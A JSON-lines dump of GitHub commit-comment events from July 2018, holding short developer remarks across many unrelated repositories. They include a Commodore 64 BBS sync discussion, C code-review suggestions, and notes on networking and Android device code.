{"id":"7933189093","type":"CommitCommentEvent","actor":{"login":"x-tec2017"},"repo":{"name":"Pinacolada64/ImageBBS"},"payload":{"comment":{"id":29631577,"position":null,"line":null,"path":null,"commit_id":"69ec3d3316d958b615fffb3c3c8f25c9a9424397","created_at":"2018-07-08T01:33:32Z","updated_at":"2018-07-08T01:33:32Z","author_association":"NONE","body":"Wow, those are all great ideas. As soon as I get this new installation set\ndone, I'll get a copy to you and maybe we can all get back on the same page\nand try better to stay in sync as progress continues.\n\nOn Sat, Jul 7, 2018, 8:39 PM Ryan Sherwood <notifications@github.com> wrote:\n\n> That's fine, it wouldn't actually take long to merge in your changes from\n> what is in this respository when I get your updated install disk. That is\n> my *whole point* of using git. The \"getting out of sync\" thing: if we all\n> used Git, we could do a git pull each day we started work, to pull down\n> the latest changes (experimental, production-ready or broken altogether 😉\n> ) to ensure we're \"all on the same page.\" If you go to your fork\n> <https://github.com/x-tec2017/ImageBBS> and do a comparison between your\n> fork and mine\n> <https://github.com/x-tec2017/ImageBBS/compare/master...Pinacolada64:master>\n> you can see all the stuff that's changed since the last one! It's kinda\n> heartening to see all the progress we've made. Although it makes it look\n> like I've done more work than I have since some of this stuff was your\n> work, and I just uploaded it under my account. You'll get the hang of it!\n>\n> I guess my thought is, if we've already got modern PCs slaved to our\n> Commodore 64s to run tcpser or BBS Server, why not have some scripted\n> process:\n>\n>    1. pull updated files from GitHub\n>    2. run them through c64list\n>    3. a terminal program calls the BBS while it's idle and put updated\n>    files on the BBS?\n>\n> There's got to be a way to do that... Getting out of sync with each other\n> (and that's just two sysops! imagine managing versions on an entire\n> network... oh wait, we have that 😄 ) ...the solution just hasn't been\n> written yet for the native C64! Hmm, now I'm thinking. I think it would be\n> really cool to write some kind of NetMaint module that checked versions of\n> installed +.files against, say, your master list on one or two particular\n> BBSes, and sent nm.F.* files (that's to send network updates, right? or\n> is that nm.U.*, I forget) down the pike to the caller.\n>\n> The purpose of a branch *is* for testing features. I know the file copier\n> with my mods isn't ready yet. You make a \"pull request\" when a feature is\n> deemed complete and ready to be brought into the \"master\" branch: i.e.,\n> goes out on the next distribution disk. I'm writing scripts that will\n> automate this stuff. I know it's a mess right now (I'm not even playing\n> 100% by my file naming conventions!), but I'm incrementally improving\n> things. There are scripts to take Commodore .prg files and turn them into\n> C64List .lbl files (for me, I know you like to do it on the real C64! which\n> is awesome!), and vice versa. It's getting easier, I think. The next step\n> would be (and I have something similar enough in my adventure game\n> repository) to automatically build a disk image out of the latest files,\n> having a build date at the end of each program in a 998 rem ... statement\n> or something -- that way you can tell at a glance you've got the latest\n> version.\n>\n> Anyway, I'm rambling... Another incoherent post by Pinacolada. Can't wait\n> to check out the latest files. 😄\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Pinacolada64/ImageBBS/commit/69ec3d3316d958b615fffb3c3c8f25c9a9424397#commitcomment-29631451>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AganoQPRipjA-r-MBL5lVG9G83SftfVbks5uEVSmgaJpZM4VF-qz>\n> .\n>\n"}},"created_at":"2018-07-08T01:33:32Z"}
{"id":"7933190706","type":"CommitCommentEvent","actor":{"login":"AdamWandoch"},"repo":{"name":"AdamWandoch/portioning-app-repo"},"payload":{"comment":{"id":29631579,"position":4,"line":15,"path":"Portioner.java","commit_id":"f5a507a960d53bfe72bdd551d96b9f405216ec28","created_at":"2018-07-08T01:35:31Z","updated_at":"2018-07-08T01:35:31Z","author_association":"OWNER","body":"wtf"}},"created_at":"2018-07-08T01:35:31Z"}
{"id":"7933191069","type":"CommitCommentEvent","actor":{"login":"zhangjiawei2018"},"repo":{"name":"zhangjiawei2018/html"},"payload":{"comment":{"id":29631580,"position":12,"line":10,"path":"README.md","commit_id":"809060ef33c08c7b12710f6b6d153870556b46df","created_at":"2018-07-08T01:35:56Z","updated_at":"2018-07-08T01:35:56Z","author_association":"OWNER","body":"后续在更新吧。第一次用 Git ，所以下次我在继续说下去\r\n"}},"created_at":"2018-07-08T01:35:56Z"}
{"id":"7933193494","type":"CommitCommentEvent","actor":{"login":"FakelsHub"},"repo":{"name":"phobos2077/sfall"},"payload":{"comment":{"id":29631586,"position":19,"line":478,"path":"sfall/Modules/Scripting/Handlers/Interface.cpp","commit_id":"2a20209bb81a8824cd2d97209d89e5f2d9292093","created_at":"2018-07-08T01:38:49Z","updated_at":"2018-07-08T01:38:49Z","author_association":"CONTRIBUTOR","body":"We begin the lesson of logic) what does this line of code `if (mode < 2 || !Ctx.arg (0) .asBool())`?\r\nThe condition is always true if mode == 0/1 or inventory_redraw (0), otherwise for mode == 2/3 and inventory_redraw (1), the `else` block always executes.\r\nThe logical operator `||` does one check, while your condition will be checked twice.\r\nWell, leave it as it is, then I'll do the optimization myself. :)"}},"created_at":"2018-07-08T01:38:49Z"}
{"id":"7933193704","type":"CommitCommentEvent","actor":{"login":"Em7999"},"repo":{"name":"Em7999/EasyLife"},"payload":{"comment":{"id":29631588,"position":null,"line":null,"path":null,"commit_id":"83d23c13da23132e2682ad4990e779882bcdf5a8","created_at":"2018-07-08T01:39:04Z","updated_at":"2018-07-08T01:39:04Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-08T01:39:04Z"}
{"id":"7933195677","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"dlyubich/02-P-Dev_Tools"},"payload":{"comment":{"id":29631589,"position":3,"line":3,"path":"find_determinant.c","commit_id":"e318836945d4f68590d839b033c67b25568333ed","created_at":"2018-07-08T01:41:24Z","updated_at":"2018-07-08T01:41:24Z","author_association":"NONE","body":"```C\r\nconst char *USAGE = \"Usage:\\n%s <matrix[0][0]> ... <matrix[n][n]\\n\";\r\n```\r\nand somewhere below in handler:\r\n```C\r\n\tif (ac == 1)\r\n\t{\r\n\t\tprintf(\"Error: no arguments provided\\n\");\r\n                printf(USAGE, argv[0]);\r\n                exit(....);\r\n\t}\r\n```"}},"created_at":"2018-07-08T01:41:24Z"}
{"id":"7933197388","type":"CommitCommentEvent","actor":{"login":"elpete"},"repo":{"name":"ortus-docs/quick-docs"},"payload":{"comment":{"id":29631594,"position":37,"line":78,"path":"getting-started/defining-an-entity.md","commit_id":"06ffbaded7e1036ba70e3910a23eeb32fd6d26ed","created_at":"2018-07-08T01:43:21Z","updated_at":"2018-07-08T01:43:21Z","author_association":"CONTRIBUTOR","body":"The property itself is necessary.  Fields are no longer mapped by default.  They are only mapped if a property exists.\r\n\r\nAccessors are not strictly required.  Quick uses `onMissingMethod` to get and set table attributes if there is no accessor defined.  If accessors are defined, Quick uses them instead."}},"created_at":"2018-07-08T01:43:21Z"}
{"id":"7933197981","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"dlyubich/02-P-Dev_Tools"},"payload":{"comment":{"id":29631596,"position":42,"line":42,"path":"find_determinant.c","commit_id":"e318836945d4f68590d839b033c67b25568333ed","created_at":"2018-07-08T01:44:03Z","updated_at":"2018-07-08T01:44:03Z","author_association":"NONE","body":"use <limits.h>\r\nmagic constants should not appeared undeclared and non-commented properly"}},"created_at":"2018-07-08T01:44:03Z"}
{"id":"7933200737","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":29631601,"position":null,"line":null,"path":null,"commit_id":"6a219c3fc492307a293175d38cf1554d60c52b7c","created_at":"2018-07-08T01:47:24Z","updated_at":"2018-07-08T01:47:24Z","author_association":"MEMBER","body":"@DNx5 @ljacqu isn't this line useless?"}},"created_at":"2018-07-08T01:47:24Z"}
{"id":"7933205545","type":"CommitCommentEvent","actor":{"login":"diplozoon"},"repo":{"name":"Kyomunymous-Dev/Kyomunymous-v2"},"payload":{"comment":{"id":29631602,"position":null,"line":null,"path":null,"commit_id":"b57c406c654c39a6c3b07c82b7b800b9cc4b2897","created_at":"2018-07-08T01:53:05Z","updated_at":"2018-07-08T01:53:05Z","author_association":"CONTRIBUTOR","body":"#2"}},"created_at":"2018-07-08T01:53:05Z"}
{"id":"7933206819","type":"CommitCommentEvent","actor":{"login":"diplozoon"},"repo":{"name":"Kyomunymous-Dev/Kyomunymous-v2"},"payload":{"comment":{"id":29631603,"position":null,"line":null,"path":null,"commit_id":"b57c406c654c39a6c3b07c82b7b800b9cc4b2897","created_at":"2018-07-08T01:54:37Z","updated_at":"2018-07-08T01:54:37Z","author_association":"CONTRIBUTOR","body":"#3"}},"created_at":"2018-07-08T01:54:37Z"}
{"id":"7933208609","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"dlyubich/02-P-Dev_Tools"},"payload":{"comment":{"id":29631605,"position":20,"line":20,"path":"find_determinant.c","commit_id":"e318836945d4f68590d839b033c67b25568333ed","created_at":"2018-07-08T01:56:51Z","updated_at":"2018-07-08T01:56:51Z","author_association":"NONE","body":"Proper sqare root:\r\n```C\r\nlong get_sqrt(long ac)\r\n{\r\n    long res = lround(sqrt((double) ac));\r\n    if (ac != res*res)  return 0;\r\n    return res;\r\n}\r\n```"}},"created_at":"2018-07-08T01:56:51Z"}
{"id":"7933211042","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"dlyubich/02-P-Dev_Tools"},"payload":{"comment":{"id":29631607,"position":1,"line":1,"path":"find_determinant.h","commit_id":"e318836945d4f68590d839b033c67b25568333ed","created_at":"2018-07-08T01:59:42Z","updated_at":"2018-07-08T01:59:42Z","author_association":"NONE","body":"First `#ifdef`s were used as include guards.\r\nThen `#pragma once` was introduces.\r\nNowadays they're not needed in most cases"}},"created_at":"2018-07-08T01:59:42Z"}
{"id":"7933695412","type":"CommitCommentEvent","actor":{"login":"JanMarvin"},"repo":{"name":"sjewo/readstata13"},"payload":{"comment":{"id":29632884,"position":null,"line":null,"path":null,"commit_id":"0878cf4d4cef537050d150202e5f4983d8d1e511","created_at":"2018-07-08T10:00:53Z","updated_at":"2018-07-08T10:00:53Z","author_association":"COLLABORATOR","body":"typos :laughing: "}},"created_at":"2018-07-08T10:00:53Z"}
{"id":"7933696623","type":"CommitCommentEvent","actor":{"login":"nbolton"},"repo":{"name":"symless/synergy-core"},"payload":{"comment":{"id":29632887,"position":null,"line":null,"path":null,"commit_id":"7834e0d7eaa86fe8a199e7ccfe5048454d6d623b","created_at":"2018-07-08T10:01:53Z","updated_at":"2018-07-08T10:01:53Z","author_association":"MEMBER","body":"https://github.com/symless/synergy-core/issues/6348"}},"created_at":"2018-07-08T10:01:53Z"}
{"id":"7933696728","type":"CommitCommentEvent","actor":{"login":"ianfab"},"repo":{"name":"ianfab/uci2wb"},"payload":{"comment":{"id":29632888,"position":null,"line":null,"path":null,"commit_id":"63c361dd1d84a6395836381739a66d06b77db901","created_at":"2018-07-08T10:02:00Z","updated_at":"2018-07-08T10:02:00Z","author_association":"OWNER","body":"@HGMuller\r\nI had some issues with the combination of UCI2WB and [Fairy-Stockfish](https://github.com/ianfab/Fairy-Stockfish), and this commit is my attempt to resolve them.\r\n\r\nOne issue was that at one point the list of variants was becoming too long, so it was not handled properly any more. Furthermore, it was not possible to communicate non-standard board sizes or piece drop rules, so I added a `info string variant ... setup ...` command in order to be able to send a full CECP `setup` command from the UCI engine. With these changes and an experimental version of my Stockfish fork that sends this setup command, the board configuration seemed to work well in XBoard, e.g., for los alamos chess and shogi variants. Do you consider adding these changes to your repository?\r\n\r\nBy the way, is there a way to clone repos from http://hgm.nubati.net/cgi-bin/gitweb.cgi? I had to download and initialize a new repo, since I could not find a URL to directly clone it from."}},"created_at":"2018-07-08T10:02:00Z"}
{"id":"7933696786","type":"CommitCommentEvent","actor":{"login":"timor"},"repo":{"name":"timor/timor-overlay"},"payload":{"comment":{"id":29632890,"position":null,"line":null,"path":null,"commit_id":"f5472c9634d89f4bfc6ab8ad3a9bf2fc401a61ef","created_at":"2018-07-08T10:02:03Z","updated_at":"2018-07-08T10:02:03Z","author_association":"OWNER","body":"current plan:\r\n- change so that entire build dir will be copied to store before installphase\r\n- maybe implement some command line tool which quickly allows creating a debug environment given an attribute as parameter, and copies the store location to an r/w location to allow modifying the source, etc.\r\n\r\nI think in general, having the debug info available separately is mostly useful for dependencies of the thing which is debugged, while for the main program, it might make more sense to just throw you into the equivalent of the build environment, so you can actually work on the package."}},"created_at":"2018-07-08T10:02:03Z"}
{"id":"7933698052","type":"CommitCommentEvent","actor":{"login":"kingbbode"},"repo":{"name":"10duck/coduck-project"},"payload":{"comment":{"id":29632892,"position":21,"line":21,"path":"coduck-batch/src/main/java/com/coduck/season/step/writer/SeasonWriter.java","commit_id":"feb1b3923ac6449e23e276c4835f98675ab4bd3d","created_at":"2018-07-08T10:03:12Z","updated_at":"2018-07-08T10:03:12Z","author_association":"CONTRIBUTOR","body":"UserRankingHistory 에 대한 이야기도 여기에 쓸게요.\r\n적절한 유니크인덱스를 추가해서 중복 삽입되지 않도록 방어할 수 있어야할 것 같아요.\r\n그냥 처리하면 두번 실행되면 두번 삽입될 가능성이 있겠죠."}},"created_at":"2018-07-08T10:03:12Z"}
{"id":"7933698385","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"remilia15/android_device_samsung_scx30g-common"},"payload":{"comment":{"id":29632893,"position":null,"line":null,"path":null,"commit_id":"f0bad3437bb8036f426706e4bece5443f4def83e","created_at":"2018-07-08T10:03:29Z","updated_at":"2018-07-08T10:03:29Z","author_association":"CONTRIBUTOR","body":"What is this hack used for?"}},"created_at":"2018-07-08T10:03:29Z"}
{"id":"7933698614","type":"CommitCommentEvent","actor":{"login":"kingbbode"},"repo":{"name":"10duck/coduck-project"},"payload":{"comment":{"id":29632897,"position":32,"line":32,"path":"coduck-batch/src/main/java/com/coduck/season/step/SeasonStepConfig.java","commit_id":"feb1b3923ac6449e23e276c4835f98675ab4bd3d","created_at":"2018-07-08T10:03:43Z","updated_at":"2018-07-08T10:03:43Z","author_association":"CONTRIBUTOR","body":"chunk 단위는 조정할 수 있도록 job parameter로 받으면 좋겠네요.\r\n"}},"created_at":"2018-07-08T10:03:43Z"}
{"id":"7933699590","type":"CommitCommentEvent","actor":{"login":"shubhamtewari"},"repo":{"name":"shubhamtewari/linuxgit"},"payload":{"comment":{"id":29632904,"position":null,"line":null,"path":null,"commit_id":"7c98251d8639566797b887a970d1c73f43641000","created_at":"2018-07-08T10:04:37Z","updated_at":"2018-07-08T10:04:37Z","author_association":"OWNER","body":"clueless"}},"created_at":"2018-07-08T10:04:37Z"}
{"id":"7933700925","type":"CommitCommentEvent","actor":{"login":"kingbbode"},"repo":{"name":"10duck/coduck-project"},"payload":{"comment":{"id":29632908,"position":18,"line":18,"path":"coduck-batch/src/main/java/com/coduck/season/SeasonJobConfig.java","commit_id":"feb1b3923ac6449e23e276c4835f98675ab4bd3d","created_at":"2018-07-08T10:05:53Z","updated_at":"2018-07-08T10:05:53Z","author_association":"CONTRIBUTOR","body":"Job Name이 좀 더 명확했으면 좋겠네요.\r\n"}},"created_at":"2018-07-08T10:05:53Z"}
{"id":"7933700993","type":"CommitCommentEvent","actor":{"login":"Gaming-Universe"},"repo":{"name":"MakeTheBrainHappy/ProjectEuler1"},"payload":{"comment":{"id":29632909,"position":null,"line":null,"path":null,"commit_id":"0fc7f75311ea13fd3c37ee54f190998c47c2c020","created_at":"2018-07-08T10:05:57Z","updated_at":"2018-07-08T10:05:57Z","author_association":"NONE","body":"Great! I might check it out!"}},"created_at":"2018-07-08T10:05:57Z"}
{"id":"7933701684","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"remilia15/android_device_samsung_scx30g-common"},"payload":{"comment":{"id":29632910,"position":null,"line":null,"path":null,"commit_id":"f0bad3437bb8036f426706e4bece5443f4def83e","created_at":"2018-07-08T10:06:33Z","updated_at":"2018-07-08T10:06:33Z","author_association":"OWNER","body":"Samsung's `RIL_CardStatus_v6` struct somehow has that big size like the above `responseLen` condition\r\nAOSP's has size of 280, so idk how to implement additional variables to increase struct size in a proper way"}},"created_at":"2018-07-08T10:06:33Z"}
{"id":"7933703075","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29632913,"position":772,"line":957,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-08T10:07:52Z","updated_at":"2018-07-08T10:07:52Z","author_association":"MEMBER","body":"I think this is the resulting prefix on the device inet6, probably 48 in this test case /32 + /16:\r\n\r\n6RD prefix: 2001:db8::/32\r\n6RD Border Relay: 10.3.0.1\r\n6RD IPv4 Prefix length: 16 bits\r\n\r\n```\r\nwan_stf: flags=4041<UP,RUNNING,LINK2> metric 0 mtu 1280\r\n\tinet6 2001:db8:264:: prefixlen 48 \r\n\tnd6 options=1<PERFORMNUD>\r\n\tv4net 192.168.2.100/16 -> tv4br 10.3.0.1\r\n\tgroups: stf \r\n```\r\n"}},"created_at":"2018-07-08T10:07:52Z"}
{"id":"7933703418","type":"CommitCommentEvent","actor":{"login":"znicholls"},"repo":{"name":"znicholls/the-littlest-jupyterhub"},"payload":{"comment":{"id":29632915,"position":26,"line":27,"path":"tljh/jupyterhub_config.py","commit_id":"3c771b6be58baaf86ada71f04c3a5f35e8c0d831","created_at":"2018-07-08T10:08:12Z","updated_at":"2018-07-08T10:08:12Z","author_association":"OWNER","body":"you are a superstar thank you!"}},"created_at":"2018-07-08T10:08:12Z"}
{"id":"7933703645","type":"CommitCommentEvent","actor":{"login":"Gaming-Universe"},"repo":{"name":"MakeTheBrainHappy/ProjectEuler1"},"payload":{"comment":{"id":29632916,"position":null,"line":null,"path":null,"commit_id":"0fc7f75311ea13fd3c37ee54f190998c47c2c020","created_at":"2018-07-08T10:08:23Z","updated_at":"2018-07-08T10:08:23Z","author_association":"NONE","body":"PS: You can also make a repository about it too!"}},"created_at":"2018-07-08T10:08:23Z"}
{"id":"7933705867","type":"CommitCommentEvent","actor":{"login":"Jondes"},"repo":{"name":"Jondes/dogs"},"payload":{"comment":{"id":29632919,"position":null,"line":null,"path":null,"commit_id":"60bb9f61306bcfa3d64b50ebc60713a2d213e4a2","created_at":"2018-07-08T10:10:20Z","updated_at":"2018-07-08T10:10:20Z","author_association":"OWNER","body":"I liked the change. Very creative."}},"created_at":"2018-07-08T10:10:20Z"}
{"id":"7933706529","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29632924,"position":796,"line":981,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-08T10:11:00Z","updated_at":"2018-07-08T10:11:00Z","author_association":"MEMBER","body":"It's trying to reconstruct part of the IPv4 prefix for info that we already gave when the device was first configured?"}},"created_at":"2018-07-08T10:11:00Z"}
{"id":"7933706602","type":"CommitCommentEvent","actor":{"login":"Jondes"},"repo":{"name":"Jondes/dogs"},"payload":{"comment":{"id":29632925,"position":null,"line":null,"path":null,"commit_id":"2054bce5a0f7f1c96fb3a4fd37fbbb6a6ce6eb46","created_at":"2018-07-08T10:11:04Z","updated_at":"2018-07-08T10:11:04Z","author_association":"OWNER","body":"I liked the change, very creative."}},"created_at":"2018-07-08T10:11:04Z"}
{"id":"7933707328","type":"CommitCommentEvent","actor":{"login":"Jondes"},"repo":{"name":"Jondes/dogs"},"payload":{"comment":{"id":29632926,"position":null,"line":null,"path":null,"commit_id":"2054bce5a0f7f1c96fb3a4fd37fbbb6a6ce6eb46","created_at":"2018-07-08T10:11:45Z","updated_at":"2018-07-08T10:11:45Z","author_association":"OWNER","body":"It could have been better."}},"created_at":"2018-07-08T10:11:45Z"}
{"id":"7933707403","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29632927,"position":796,"line":981,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-08T10:11:48Z","updated_at":"2018-07-08T10:11:48Z","author_association":"MEMBER","body":"Not that this is good in any way... Should simply add a debug at the end and see what it cleverly calculates."}},"created_at":"2018-07-08T10:11:48Z"}
{"id":"7933710510","type":"CommitCommentEvent","actor":{"login":"dyusuf"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29632939,"position":44,"line":44,"path":"string_db.html","commit_id":"29c6136c7d81e91a4e52e6e4998eaac2bf8c9c08","created_at":"2018-07-08T10:14:35Z","updated_at":"2018-07-08T10:14:35Z","author_association":"COLLABORATOR","body":"To start our project, we first focus on human and mouse. "}},"created_at":"2018-07-08T10:14:35Z"}
{"id":"7933711218","type":"CommitCommentEvent","actor":{"login":"elhigu"},"repo":{"name":"tgriesser/knex"},"payload":{"comment":{"id":29632941,"position":null,"line":null,"path":null,"commit_id":"8a2167630ae973cf3deb20cbf4372ed435bae4f0","created_at":"2018-07-08T10:15:12Z","updated_at":"2018-07-08T10:15:12Z","author_association":"COLLABORATOR","body":"Yep, I added comment to that file in latest version (I'm forcepushing modification to the last commit)"}},"created_at":"2018-07-08T10:15:12Z"}
{"id":"7933712179","type":"CommitCommentEvent","actor":{"login":"eriksl"},"repo":{"name":"OpenPLi/openpli-oe-core"},"payload":{"comment":{"id":29632944,"position":null,"line":null,"path":null,"commit_id":"9df1a95c76fe4bfec6d82ccb155499ed212e9365","created_at":"2018-07-08T10:16:03Z","updated_at":"2018-07-08T10:16:03Z","author_association":"MEMBER","body":"Thumbs up!"}},"created_at":"2018-07-08T10:16:03Z"}
{"id":"7933712880","type":"CommitCommentEvent","actor":{"login":"frenck"},"repo":{"name":"home-assistant/home-assistant"},"payload":{"comment":{"id":29632947,"position":null,"line":null,"path":null,"commit_id":"34392db9e4eadb3ae31e5c7ca3542cb0291a02ad","created_at":"2018-07-08T10:16:40Z","updated_at":"2018-07-08T10:16:40Z","author_association":"MEMBER","body":"Thank you for your concerns. Nevertheless, as said, this is allowed in our way of working."}},"created_at":"2018-07-08T10:16:40Z"}
{"id":"7933713288","type":"CommitCommentEvent","actor":{"login":"zhaoguo2008"},"repo":{"name":"zhaoguo2008/nci-poc-app"},"payload":{"comment":{"id":29632949,"position":null,"line":null,"path":null,"commit_id":"85fbc6da04e5161fcfb07b63c81c603f00e5501e","created_at":"2018-07-08T10:17:04Z","updated_at":"2018-07-08T10:17:04Z","author_association":"OWNER","body":"删除初始化.DS_Store"}},"created_at":"2018-07-08T10:17:04Z"}
{"id":"7933714416","type":"CommitCommentEvent","actor":{"login":"nlct"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29632953,"position":159,"line":310,"path":"docs/chapters/rules.tex","commit_id":"1271dfa34e7525d48696fa60d063ac1803418599","created_at":"2018-07-08T10:18:05Z","updated_at":"2018-07-08T10:18:05Z","author_association":"COLLABORATOR","body":"I'm sorry, I think I already queried this and completely forgot! I must be losing some of my marbles!"}},"created_at":"2018-07-08T10:18:05Z"}
{"id":"7933716866","type":"CommitCommentEvent","actor":{"login":"eriksl"},"repo":{"name":"OpenPLi/openpli-oe-core"},"payload":{"comment":{"id":29632956,"position":null,"line":null,"path":null,"commit_id":"793cbe1a015f4c4ca95b015903cbea14199fcfc6","created_at":"2018-07-08T10:20:24Z","updated_at":"2018-07-08T10:20:24Z","author_association":"MEMBER","body":"Please note:\r\n- OE says mdev is poorly supported and may be removed at some time in the future\r\n- some packages are incompatble with mdev and cause eudev to be installed anyway\r\n\r\nSo I guess we should work eudev working anyway before we can release."}},"created_at":"2018-07-08T10:20:24Z"}
{"id":"7933717689","type":"CommitCommentEvent","actor":{"login":"dominiklohmann"},"repo":{"name":"koekeishiya/chunkwm"},"payload":{"comment":{"id":29632962,"position":21,"line":80,"path":"src/plugins/tiling/controller.cpp","commit_id":"31ed544516ef55c5d8ec78ffb376f623d80c8991","created_at":"2018-07-08T10:21:12Z","updated_at":"2018-07-08T10:21:12Z","author_association":"CONTRIBUTOR","body":"Considering this is never reenabled, shouldn't this only be called once initially? Or rather be reenabled afterwards?"}},"created_at":"2018-07-08T10:21:12Z"}
{"id":"7933728005","type":"CommitCommentEvent","actor":{"login":"technic"},"repo":{"name":"technic/e2testBox"},"payload":{"comment":{"id":29632983,"position":null,"line":null,"path":null,"commit_id":"9eea917bb356d2a0be217d33e4db49e2734aca49","created_at":"2018-07-08T10:30:24Z","updated_at":"2018-07-08T10:30:24Z","author_association":"OWNER","body":"Depends on your needs. Pli develop branch doesn't have servicemp3 patches that allows to output video to sdl. But after several sdl fixes, that I submitted recently it should be possible to show GUI."}},"created_at":"2018-07-08T10:30:24Z"}
{"id":"7933728420","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29632984,"position":159,"line":310,"path":"docs/chapters/rules.tex","commit_id":"1271dfa34e7525d48696fa60d063ac1803418599","created_at":"2018-07-08T10:30:42Z","updated_at":"2018-07-08T10:30:42Z","author_association":"OWNER","body":"Oh no worries! :duck: "}},"created_at":"2018-07-08T10:30:42Z"}
{"id":"7933729577","type":"CommitCommentEvent","actor":{"login":"fruether"},"repo":{"name":"fruether/openmrs-core"},"payload":{"comment":{"id":29632985,"position":null,"line":null,"path":null,"commit_id":"bb6e557a34b494f13290c2fb9a9a5ea25a34c1e1","created_at":"2018-07-08T10:31:42Z","updated_at":"2018-07-08T10:31:42Z","author_association":"OWNER","body":"Fixing TRUNK-5395 and also some merges from remote branch are added in this commit (not sure if this is bad) "}},"created_at":"2018-07-08T10:31:42Z"}
{"id":"7933733236","type":"CommitCommentEvent","actor":{"login":"bbatsov"},"repo":{"name":"clojure-emacs/clj-refactor.el"},"payload":{"comment":{"id":29632990,"position":null,"line":null,"path":null,"commit_id":"443f0860d1d1c209cf4baae998f55df0616a819f","created_at":"2018-07-08T10:34:53Z","updated_at":"2018-07-08T10:34:53Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-08T10:34:53Z"}
{"id":"7933738508","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/meta-dream"},"payload":{"comment":{"id":29633006,"position":null,"line":null,"path":null,"commit_id":"02d2ad5b86e1f687b867e6bb581ca2b4be679159","created_at":"2018-07-08T10:39:28Z","updated_at":"2018-07-08T10:39:28Z","author_association":"MEMBER","body":"We need this for develop too.\r\nI did so many changes to PLi so it's normal :)"}},"created_at":"2018-07-08T10:39:28Z"}
{"id":"7933741043","type":"CommitCommentEvent","actor":{"login":"lindyhopchris"},"repo":{"name":"cloudcreativity/laravel-json-api"},"payload":{"comment":{"id":29633013,"position":null,"line":null,"path":null,"commit_id":"ea135721a836940afedabb74cf7888e26afa482f","created_at":"2018-07-08T10:41:40Z","updated_at":"2018-07-08T10:41:40Z","author_association":"MEMBER","body":"https://github.com/cloudcreativity/laravel-json-api/issues/202"}},"created_at":"2018-07-08T10:41:40Z"}
{"id":"7933741054","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":29633014,"position":28,"line":28,"path":"core/core-env.el","commit_id":"6220ace290b247265de8fac66bd9e84bef388326","created_at":"2018-07-08T10:41:41Z","updated_at":"2018-07-08T10:41:41Z","author_association":"NONE","body":"@CestDiego Don't know of any breakage from adding `-l`, but `-ic` already assumes a Bourne-style shell and breaks on C shells.\r\n\r\nOverall: this won't work in general or for `tcsh`, but seems to work for `zsh`. I haven't used `zsh` but the code in https://github.com/purcell/exec-path-from-shell suggests it's close enough to bash here."}},"created_at":"2018-07-08T10:41:41Z"}
{"id":"7933741498","type":"CommitCommentEvent","actor":{"login":"wloot"},"repo":{"name":"nobodytouchmyboost/android_device_xiaomi_msm8956-common"},"payload":{"comment":{"id":29633015,"position":null,"line":null,"path":null,"commit_id":"dbe3f32ccd32da6c886848b0cd949f46ecc94b5a","created_at":"2018-07-08T10:42:06Z","updated_at":"2018-07-08T10:42:06Z","author_association":"NONE","body":"start perfd?\r\nand I don't think it's a good idea to change the log level...."}},"created_at":"2018-07-08T10:42:06Z"}
{"id":"7933743689","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/control-feedstock"},"payload":{"comment":{"id":29633024,"position":null,"line":null,"path":null,"commit_id":"e8ce529f7735e2873e10040a6393b701d0adcea3","created_at":"2018-07-08T10:44:08Z","updated_at":"2018-07-08T10:44:08Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @murrayrm were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-08T10:44:08Z"}
{"id":"7933743935","type":"CommitCommentEvent","actor":{"login":"Yardanico"},"repo":{"name":"cavariux/figures"},"payload":{"comment":{"id":29633025,"position":null,"line":null,"path":null,"commit_id":"4eb161c98d9b4aaad9c98d41b8ec63fb8e79bd5a","created_at":"2018-07-08T10:44:19Z","updated_at":"2018-07-08T10:44:19Z","author_association":"NONE","body":"@cavariux just a small note: you have a binary \"test\" in tests folder"}},"created_at":"2018-07-08T10:44:19Z"}
